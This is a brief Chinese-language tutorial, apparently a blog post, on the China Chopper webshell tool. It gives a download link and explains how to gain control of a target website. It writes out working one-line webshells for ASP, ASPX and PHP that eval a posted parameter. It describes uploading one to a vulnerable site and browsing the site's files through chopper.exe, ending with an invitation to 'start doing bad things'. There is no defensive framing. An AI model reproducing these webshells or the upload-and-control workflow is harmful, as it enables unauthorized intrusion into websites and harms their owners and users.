中國菜刀下載地址: http://pan.baidu.com/share/link?shareid=871753024&uk=388464620
一.基本操作:
往目標網站中加入一句話木馬,然後你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網站目錄
二.實戰
asp的一句話是:
<%eval request ("pass")%>
aspx的一句話是:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句話是:
<?php @eval($_POST['pass']);?>
我們可以直接將這些語句插入到網站上的某個asp/aspx/php文件上,或者直接創建一個新的文件,在裏面寫入這些語句,然後把文件上傳到網站上即可。
下面舉個小例子:
然後假設我們有個智障網站有這樣的漏洞:
我們把這個lubr.php上傳上去後,打開chopper.exe
連接到這個網址下我們的菜刀文件上,右鍵點擊文件管理,就可以獲取整個網站的目錄了~然後就可以開始做壞事。